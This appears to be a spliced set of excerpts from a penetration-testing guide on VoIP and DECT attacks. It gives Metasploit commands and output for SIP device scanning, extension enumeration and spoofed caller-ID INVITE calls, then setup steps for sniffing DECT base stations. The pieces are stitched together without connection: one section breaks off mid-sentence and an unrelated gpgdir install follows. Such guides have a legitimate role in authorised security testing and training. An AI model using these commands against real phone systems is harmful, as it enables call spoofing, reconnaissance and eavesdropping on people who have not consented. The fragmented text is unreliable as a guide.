        -i IPv4 source IP address [default is IP address of interface]
        -S srcPort (0 - 65535) [default is well-known discard port 9]
        -D destPort (0 - 65535) [default is well-known SIP port 5060]
        -l lineString line used by SNOM [default is blank]
        -s sleep time btwn INVITE msgs (usec)
        -h help - print this usage
        -v verbose output mode
Metasploit provides a SIP scanner auxiliary which comes in
two flavors, TCP and UDP; we can use it to discover SIP
enabled devices using the OPTIONS method. Let's see an
example of the UDP version, scanner/sip/options.
Auxiliary options and usage:
msf > use auxiliary/scanner/sip/options
msf auxiliary(options) > show options

Module options (auxiliary/scanner/sip/options):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   CHOST                       no        The local client address
   CPORT      5060             no        The local client port
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   THREADS    1                yes       The number of concurrent threads
   TO         nobody           no        The destination username to probe at each host

msf auxiliary(options) > set RHOSTS 192.168.1.130/24
RHOSTS => 192.168.1.130/24
msf auxiliary(options) > run
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   CHOST                       no        The local client address
   CPORT      5060             no        The local client port
   MAXEXT     9999             yes       Ending extension
   METHOD     REGISTER         yes       Enumeration method to use OPTIONS/REGISTER
   MINEXT     0                yes       Starting extension
   PADLEN     4                yes       Cero padding maximum length
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   THREADS    1                yes       The number of concurrent threads
Example Usage:
msf auxiliary(enumerator) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(enumerator) > set MINEXT 100
MINEXT => 100
msf auxiliary(enumerator) > set MAXEXT 500
MAXEXT => 500
msf auxiliary(enumerator) > set PADLEN 3
PADLEN => 3
msf auxiliary(enumerator) > run
The voip/sip_invite_spoof auxiliary will create a fake SIP
INVITE request, making the targeted device ring and display
fake caller ID information. Auxiliary options:
msf > use voip/sip_invite_spoof
msf auxiliary(sip_invite_spoof) > show options

Module options (auxiliary/voip/sip_invite_spoof):

   Name     Current Setting         Required  Description
   ----     ---------------         --------  -----------
   MSG      The Metasploit has you  yes       The spoofed caller id to send
   RHOSTS                           yes       The target address range or CIDR identifier
   RPORT    5060                    yes       The target port
   SRCADDR  192.168.1.1             yes       The sip address the spoofed call is coming from
   THREADS  1                       yes       The number of concurrent threads
Example Usage:
msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(sip_invite_spoof) > run
[*] Sending Fake SIP Invite to: 192.168.1.104
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Exploiting VoIP systems
Metasploit includes several exploits for SIP client software
and even for the Trixbox PBX web management interface.
Although this is not a SIP-specific vulnerability, it is still
related and can enable a full control by an attacker on a
This stage is optional for those wanting to build the tools from source code.
root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/
root@bt:~# cd /pentest/telephony
root@bt:~# svn co https://dedected.org/svn/trunk dedected_svn
root@bt:~# cd dedected_svn/com-on-air_cs-linux/
root@bt:~# make && make -C tools
Install some additional tools
root@bt:~# apt-get -y install audacity
Load the drivers
root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux
root@bt:~# make node
If you did not insert your Dosch&Amand Type 2 or Type 3 or Voo:doo # PCMCIA-card do so
now! Next, we load the driver:
root@bt:~# make load
Scan for fixed parts a.k.a. fp (DECT base stations)
root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux/tools
root@bt:~# ./dect_cli
If you need info on the usage, type "help". If you live in the U.S., switch to the US/DECT 6
band via the "band" command. Let's enable some verbosity:
verb
And start scanning for base stations:
fpscan
After scanning 2-3 times through all channels disable verbosity, and stop scanning:
verb
stop
Ignore phones you don’t want to sniff (e.g. your neighbours!)
root@bt: /usr/local/src/gpgdir# tar xfj gpgdir-1.9.5.tar.bz2
root@bt: /usr/local/src/gpgdir# cd gpgdir-1.9.5
root@bt: /usr/local/src/gpgdir/gpgdir-1.9.5# ./install.pl